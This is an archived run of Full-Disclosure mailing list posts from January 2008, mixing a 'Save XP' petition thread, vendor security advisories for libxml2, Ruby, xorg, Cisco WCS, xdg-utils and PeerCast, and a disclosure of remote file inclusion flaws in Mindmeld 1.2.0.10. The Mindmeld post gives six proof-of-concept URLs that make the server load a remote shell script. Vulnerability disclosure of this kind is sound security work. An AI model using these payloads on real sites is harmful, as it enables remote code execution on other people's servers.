Re: [Full-disclosure] Save XP
On Jan 28, 2008 10:45 PM, Paul Schmehl [EMAIL PROTECTED] wrote: Or, rather than trying to swim upstream, you could buy a Mac. Or install *nix* on your Winblows computer.. That's not a good alternative. Windows has only a single reason to exist, and that is running games, since wine cannot run everything. My winxp partition is labeled Playstation... Unfortunately, since i like to play, i'm forced to use win for it. And since winxp is the only decent windows, making microsoft continue their only useful operating system is indeed a good purpose. I hope i've explained my PoV of why that petition is not so bad after all... -- LT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
On Jan 28, 2008 3:43 PM, scott [EMAIL PROTECTED] wrote: For all those who believe Vista is still not up to par,you can help stop MS from forcing us to go to Vista. For those who don't know,MS is planning on stopping XP sales after June 30,2008.There are a few options for enterprise users,but Joe XP user will not be able to go to any store and buy a copy of XP after that date.Or at least after the stores sell out of what they have on hand. You can sign a petition at InfoWorld that may delay or stop MS from forcing us to use Vista. Sign the petition here: http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; Maybe we can stop this. You have two choices: http://thepiratebay.org/search/xp/0/99/300 or the Chinese market ;-) -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200801-20 ] libxml2: Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200801-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxml2: Denial of Service Date: January 30, 2008 Bugs: #202628 ID: 200801-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A Denial of Service vulnerability has been reported in libxml2. Background == libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-libs/libxml2 2.6.30-r1= 2.6.30-r1 Description === Brad Fitzpatrick reported that the xmlCurrentChar() function does not properly handle some UTF-8 multibyte encodings. Impact == A remote attacker could entice a user to open a specially crafted XML document with an application using libxml2, possibly resulting in a high CPU consumption. Note that this vulnerability could also be triggered without user interaction by an automated system processing XML content. Workaround == There is no known workaround at this time. Resolution == All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/libxml2-2.6.30-r1 References == [ 1 ] CVE-2007-6284 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6284 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-20.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHoP7JuhJ+ozIKI5gRAkMZAKCF6o0hVemWvGX0T/dhTT65VSj6BACfbjVP /gq7Lknkq1FRSJhkx76bT8I= =t8VA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:029 ] - Updated ruby packages fix possible man-in-the-middle attack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:029 http://www.mandriva.com/security/ ___ Package : ruby Date: January 31, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: Ruby network libraries Net::HTTP, Net::IMAP, Net::FTPTLS, Net::Telnet, Net::POP3, and Net::SMTP, up to Ruby version 1.8.6 are affected by a possible man-in-the-middle attack, when using SSL, due to a missing check of the CN (common name) attribute in SSL certificates against the server's hostname. The updated packages have been patched to prevent the issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5770 ___ Updated Packages: Mandriva Linux 2007.0: 7d6503b580cadab905ac3ef4fde32495 2007.0/i586/ruby-1.8.5-2.3mdv2007.0.i586.rpm 03f626e55f2da3d50e4af6a625f2d981 2007.0/i586/ruby-devel-1.8.5-2.3mdv2007.0.i586.rpm a286449f58ebbb35ef96b104e8148394 2007.0/i586/ruby-doc-1.8.5-2.3mdv2007.0.i586.rpm 8124af6a429b10089ef3671f36285f81 2007.0/i586/ruby-tk-1.8.5-2.3mdv2007.0.i586.rpm c542b49863e6407a3563e4bcf9207fbc 2007.0/SRPMS/ruby-1.8.5-2.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 1488eb95c352a23961ad3729108aab31 2007.0/x86_64/ruby-1.8.5-2.3mdv2007.0.x86_64.rpm 729771da6e301b5c7b5754f95c85e478 2007.0/x86_64/ruby-devel-1.8.5-2.3mdv2007.0.x86_64.rpm 69827a0c924ffd3da5e084ea04e36fef 2007.0/x86_64/ruby-doc-1.8.5-2.3mdv2007.0.x86_64.rpm cb12889526c54ed686c327c137f1320c 2007.0/x86_64/ruby-tk-1.8.5-2.3mdv2007.0.x86_64.rpm c542b49863e6407a3563e4bcf9207fbc 2007.0/SRPMS/ruby-1.8.5-2.3mdv2007.0.src.rpm Mandriva Linux 2007.1: 615468da1639248f8c60d7a8ef575d1b 2007.1/i586/ruby-1.8.5-5.1mdv2007.1.i586.rpm cda9083dd1e1df7c4a49db1e0ec20008 2007.1/i586/ruby-devel-1.8.5-5.1mdv2007.1.i586.rpm 0268152c83d14133ac35cc7ee52cf60a 2007.1/i586/ruby-doc-1.8.5-5.1mdv2007.1.i586.rpm c1c580dfddc099a2af9c61b33b9f0a2f 2007.1/i586/ruby-tk-1.8.5-5.1mdv2007.1.i586.rpm 3d221074342e5f457373ab1aff977a96 2007.1/SRPMS/ruby-1.8.5-5.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 89de1e6816cc708d5401200405be508f 2007.1/x86_64/ruby-1.8.5-5.1mdv2007.1.x86_64.rpm 4e0003bc558584d6f95716d8818388ce 2007.1/x86_64/ruby-devel-1.8.5-5.1mdv2007.1.x86_64.rpm 87a5495beeb8138292aab40ce099b07b 2007.1/x86_64/ruby-doc-1.8.5-5.1mdv2007.1.x86_64.rpm 128ce81eeb4168cb915696f76d15c448 2007.1/x86_64/ruby-tk-1.8.5-5.1mdv2007.1.x86_64.rpm 3d221074342e5f457373ab1aff977a96 2007.1/SRPMS/ruby-1.8.5-5.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 279f855dd2f179827968d9c9a6ee60ee 2008.0/i586/ruby-1.8.6-5.1mdv2008.0.i586.rpm 454911b3e84a0de35e9905eadeba6852 2008.0/i586/ruby-devel-1.8.6-5.1mdv2008.0.i586.rpm 0bdf3776e48c584eb05db2d96675957b 2008.0/i586/ruby-doc-1.8.6-5.1mdv2008.0.i586.rpm 7a857b992180398881e396cb802d0274 2008.0/i586/ruby-tk-1.8.6-5.1mdv2008.0.i586.rpm c5f286aee44c6d309fd12248d68856dc 2008.0/SRPMS/ruby-1.8.6-5.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 05e24b17c69c26e10cf48c4f83c095f9 2008.0/x86_64/ruby-1.8.6-5.1mdv2008.0.x86_64.rpm c7bb81a0ef557c621016a8c5468d9022 2008.0/x86_64/ruby-devel-1.8.6-5.1mdv2008.0.x86_64.rpm e550ae1cb99aa67711acb5d6c6af64ac 2008.0/x86_64/ruby-doc-1.8.6-5.1mdv2008.0.x86_64.rpm a8981603df024791c9e1d273717ce5f9 2008.0/x86_64/ruby-tk-1.8.6-5.1mdv2008.0.x86_64.rpm c5f286aee44c6d309fd12248d68856dc 2008.0/SRPMS/ruby-1.8.6-5.1mdv2008.0.src.rpm Corporate 3.0: bd239b9b3ed6a8fd456f42a399bc79f8 corporate/3.0/i586/ruby-1.8.1-1.9.C30mdk.i586.rpm 585ed391895ecc23a09ea55ed7bc0a8c corporate/3.0/i586/ruby-devel-1.8.1-1.9.C30mdk.i586.rpm c5d6ef08a414db182d937426c6aeecd3 corporate/3.0/i586/ruby-doc-1.8.1-1.9.C30mdk.i586.rpm c87e858fede1106544bb925d594f1964 corporate/3.0/i586/ruby-tk-1.8.1-1.9.C30mdk.i586.rpm b53c77b5e98f20209db9b932b8a4734d corporate/3.0/SRPMS/ruby-1.8.1-1.9.C30mdk.src.rpm Corporate 3.0/X86_64: 6487b1d817b08f91074961f6c42a136a corporate/3.0/x86_64/ruby-1.8.1-1.9.C30mdk.x86_64.rpm 0277376e6ef0897fd024b5e9ec9a8a06 corporate/3.0/x86_64/ruby-devel-1.8.1-1.9.C30mdk.x86_64.rpm 6ee5839e1af2c82da8ef604f83601e21 corporate/3.0/x86_64/ruby-doc-1.8.1-1.9.C30mdk.x86_64.rpm 89ecdfcd225bc24a1437e0f09e513ba9 corporate/3.0/x86_64/ruby-tk-1.8.1-1.9.C30mdk.x86_64.rpm b53c77b5e98f20209db9b932b8a4734d corporate/3.0/SRPMS/ruby-1.8.1-1.9.C30mdk.src.rpm Corporate 4.0: 311e14d160453952e4cc0e91599185d3 corporate/4.0/i586/ruby-1.8.2-7.6.20060mlcs4.i586.rpm 3857b0d6eff2a26f606aa2701819a470
[Full-disclosure] rPSA-2008-0032-1 xorg-x11 xorg-x11-fonts xorg-x11-tools xorg-x11-xfs
rPath Security Advisory: 2008-0032-1 Published: 2008-01-30 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Severe Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: [EMAIL PROTECTED]:1/6.8.2-30.13-1 [EMAIL PROTECTED]:1/6.8.2-30.13-1 [EMAIL PROTECTED]:1/6.8.2-30.13-1 [EMAIL PROTECTED]:1/6.8.2-30.13-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1970 https://issues.rpath.com/browse/RPL-2010 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958 Description: Previous versions of the xorg-x11 package contain multiple vulnerabilities, the most serious of which allow authenticated users to execute arbitrary code with elevated privileges. http://wiki.rpath.com/Advisories:rPSA-2008-0032 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so Vulnerability Advisory ID: cisco-sa-20080130-wcs http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml Revision 1.0 For Public Release 2008 January 30 1600 UTC (GMT) +--- Summary === Apache Tomcat is the servlet container for JavaServlet and JavaServer Pages Web within the Cisco Wireless Control System (WCS). A vulnerability exists in the mod_jk.so URI handler within Apache Tomcat which, if exploited, may result in a remote code execution attack. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml. Affected Products = This section provides details on affected products. Vulnerable Products +-- Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are affected by this vulnerability. Cisco WCS devices running software 4.1.x and 4.2.x prior to to version 4.2.62.0 are also vulnerable. Note: The version of WCS software installed on a particular device can be found via the WCS HTTP management interface. Select Help - About the Software to obtain the software version. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by this vulnerability. Details === The Cisco Wireless Control System is a centralized, systems-level platform for managing and controlling lightweight access points, wireless LAN controllers, and Wireless Location Appliances for the Cisco Unified Wireless Network. The Cisco Wireless Control System uses Apache Tomcat. A vulnerability in Apache Tomcat may allow for remote code execution attacks. The mod_jk.so URI handler does not handle long URLs correctly. An insecure memory copy triggers an exploitable stack overflow. This vulnerability is documented in CVE-2007-0774 and in Cisco bug ID CSCsk18191. Vulnerability Scoring Details + Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. CSCsk18191 - WCS mod_jk.so Apache Tomcat vulnerability CVSS Base Score - 10.0 Access Vector -Network Access Complexity -Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level -Official-Fix Report Confidence -Confirmed Impact == Successful exploitation of the vulnerability may result in remote code execution. Software Versions and Fixes === Each row of the following software table (below) describes a release train and the platforms or products for which it is intended. If a given release train is vulnerable, then the earliest possible releases that contain the fix are shown in the First Fixed Release column. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. The release should be upgraded at least to the indicated release or a later version (greater than or equal to the First Fixed Release label). +-+ | Affected Releases | First Fixed | | | Releases | |-+---| | WCS for Linux and Windows 4.0.x and | 4.0.100.0 | | earlier | | |-+---| | WCS for Linux and Windows 4.1.91.0 and | 4.2.62.0 | | earlier | | +-+ When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the
Re: [Full-disclosure] [ GLSA 200801-17 ] Netkit FTP Server: Denial of Service
Unsubscribe full-disclosure On 29/01/08 4:09 PM, Raphael Marichez [EMAIL PROTECTED] wrote: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200801-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Netkit FTP Server: Denial of Service Date: January 29, 2008 Bugs: #199206 ID: 200801-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Netkit FTP Server contains a Denial of Service vulnerability. Background == net-ftp/netkit-ftpd is the Linux Netkit FTP server with optional SSL support. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-ftp/netkit-ftpd 0.17-r7 = 0.17-r7 Description === Venustech AD-LAB discovered that an FTP client connected to a vulnerable server with passive mode and SSL support can trigger an fclose() function call on an uninitialized stream in ftpd.c. Impact == A remote attacker can send specially crafted FTP data to a server with passive mode and SSL support, causing the ftpd daemon to crash. Workaround == Disable passive mode or SSL. Resolution == All Netkit FTP Server users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-ftp/netkit-ftpd-0.17-r7 References == [ 1 ] CVE-2007-6263 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6263 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
Were there similar cry's for windows 95 / 98 in years past ? /mgk James Matthews wrote: Ok signed up! I hope it works! On Jan 28, 2008 9:43 PM, scott [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: For all those who believe Vista is still not up to par,you can help stop MS from forcing us to go to Vista. For those who don't know,MS is planning on stopping XP sales after June 30,2008.There are a few options for enterprise users,but Joe XP user will not be able to go to any store and buy a copy of XP after that date.Or at least after the stores sell out of what they have on hand. You can sign a petition at InfoWorld that may delay or stop MS from forcing us to use Vista. Sign the petition here: http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; Maybe we can stop this. Regards, Scott ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://search.goldwatches.com/?Search=Movado+Watches http://www.jewelerslounge.com http://www.goldwatches.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] dude vanwinkle turns against fergdawg, trendmicro
http://linuxbox.org/pipermail/funsec/2008-January/016043.html explosive scenes have been witnessed by n3td3v group as VanWinkle spreads attack on Fergdawg and Trendmicro Fergdawg lusts up the chance to plug he works for the company hand jerk sound effects We don't know if the FIGHT/CONFLCIT/WAR will continue in the thread, but signals of unrest between FUNSEC regulars is only just kicking off. get your ring side seats, only VanWinkle will survive. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
Yes and MS quietly extended 98 for a few more years until they came out with 2000.A much better OS than ME at the time,IMHO. Scott mgk.mailing wrote: Were there similar cry's for windows 95 / 98 in years past ? /mgk James Matthews wrote: Ok signed up! I hope it works! On Jan 28, 2008 9:43 PM, scott [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: For all those who believe Vista is still not up to par,you can help stop MS from forcing us to go to Vista. For those who don't know,MS is planning on stopping XP sales after June 30,2008.There are a few options for enterprise users,but Joe XP user will not be able to go to any store and buy a copy of XP after that date.Or at least after the stores sell out of what they have on hand. You can sign a petition at InfoWorld that may delay or stop MS from forcing us to use Vista. Sign the petition here: http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; Maybe we can stop this. Regards, Scott ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://search.goldwatches.com/?Search=Movado+Watches http://www.jewelerslounge.com http://www.goldwatches.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200801-21 ] Xdg-Utils: Arbitrary command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200801-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Xdg-Utils: Arbitrary command execution Date: January 30, 2008 Bugs: #207331 ID: 200801-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in Xdg-Utils, allowing for the remote execution of arbitrary commands. Background == Xdg-Utils is a set of tools allowing all applications to easily integrate with the Free Desktop configuration. Affected packages = --- Package / Vulnerable / Unaffected --- 1 x11-misc/xdg-utils 1.0.2-r1 = 1.0.2-r1 Description === Miroslav Lichvar discovered that the xdg-open and xdg-email shell scripts do not properly sanitize their input before processing it. Impact == A remote attacker could entice a user to open a specially crafted link with a vulnerable application using Xdg-Utils (e.g. an email client), resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Xdg-Utils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =x11-misc/xdg-utils-1.0.2-r1 References == [ 1 ] CVE-2008-0386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0386 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-21.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHoQGWuhJ+ozIKI5gRAr09AJ9a4Kq+tiATG8uAue5yZFv/WChG1QCfbiyC Nn5LZMgA1KVZFgLYHYX6pgo= =IkQ6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200801-22 ] PeerCast: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security AdvisoryGLSA 200801-22:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PeerCast: Buffer overflow Date: January 30, 2008 Updated: January 30, 2008 Bugs: #202747 ID: 200801-22:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability has been discovered in PeerCast. Background == PeerCast is a client and server for P2P-radio network Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/peercast 0.1218 = 0.1218 Description === Luigi Auriemma reported a heap-based buffer overflow within the handshakeHTTP() function when processing HTTP requests. Impact == A remote attacker could send a specially crafted request to the vulnerable server, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the PeerCast server, usually nobody. Workaround == There is no known workaround at this time. Resolution == All PeerCast users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-sound/peercast-0.1218 References == [ 1 ] CVE-2007-6454 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6454 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHoQXSuhJ+ozIKI5gRAjt2AJ9DJWDt8dQGon3Ko7t/8Wd9eyxlAQCdF4m6 5HDWgrpZTI1V//W92M7ubFs= =GdER -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] dude vanwinkle turns against fergdawg, trendmicro
shut up On Jan 30, 2008 8:15 PM, worried security [EMAIL PROTECTED] wrote: http://linuxbox.org/pipermail/funsec/2008-January/016043.html explosive scenes have been witnessed by n3td3v group as VanWinkle spreads attack on Fergdawg and Trendmicro Fergdawg lusts up the chance to plug he works for the company hand jerk sound effects We don't know if the FIGHT/CONFLCIT/WAR will continue in the thread, but signals of unrest between FUNSEC regulars is only just kicking off. get your ring side seats, only VanWinkle will survive. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- smile tomorrow will be worse ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Remote File Inclusion Vulnerabilities in Mindmeld version 1.2.0.10
Summary
Mindmeld is an, enterprise-capable knowledge-sharing system written
in PHP. There are multiple remote file inclusion vulnerabilities in
Mindmeld version 1.2.0.10 (latest version).
Details
1. Vulnerable File and Line:
Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home'].include/utilities.inc );
PoC:
http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
2. Vulnerable file and line:
Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . interfaces
{$MM_GLOBALS['interface']}/include/ .
interface_{$MM_GLOBALS['interface']}_ask.inc );
PoC:
http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://
shell_server/shell.php?php?
---
3. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . interfaces/
{$MM_GLOBALS['interface']}/include/
PoC:
http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
4. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . interfaces/
{$MM_GLOBALS['interface']}/include/
PoC:
http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
5. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );
PoC:
http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
6. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . include/utilities.inc );
PoC:
http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
It appears that these vulnerabilities are not vulnerable to local file
includes.
These vulnerabilities have been disclosed to the vendor although
development on this software has stopped.
Sources:
http://mindmeld.sourceforge.net/
Quick Fix:
In php.ini, disable the following variables: register_globals,
allow_url_fopen, and allow_url_include.
Credit:
David Wharton
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
Sometimes I'm reminded of why Full Disclosure amuses me and why I stay subscribed On 1/30/08, scott [EMAIL PROTECTED] wrote: Yes and MS quietly extended 98 for a few more years until they came out with 2000.A much better OS than ME at the time,IMHO. Windows ME Release Date: Sept. 14, 2000 Windows 2000 Release Date: Feb. 17, 2000 Windows 2000 was out half a year ahead of Windows ME... so something tells me they didn't quietly extend 98 for a few more years until they came out with 2000... even if you were talking XP (which was Oct 2001) it would be a year, not a few years. Bill: You aren't being fair with our EOL dates. You are comparing XP Pro (Officially a business operating system) to Vista Home Premium (a Home operating System)... you have to compare XP Pro to a Business version of Vista and when you do that you get Vista Business with an EOL of 2017 ( http://support.microsoft.com/lifecycle/?p1=11707 ), 3 years after XP Pro. Tyler. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Livelink UTF-7 XSS Vulnerability
Release date: 31/Jan/2008 Last Modified: N/A Author: David Kierznowski http://withdk.com Application: Linklink = 9.7.0 Risk: Medium Full details of advisory available here: http://www.withdk.com/2008/01/31/livelink-utf-7-xss-vulnerability/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] undersea cable cut and internet problem!
http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html -- advertise on secgeeks? http://secgeeks.com/Advertising_on_Secgeeks.com http://newskicks.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
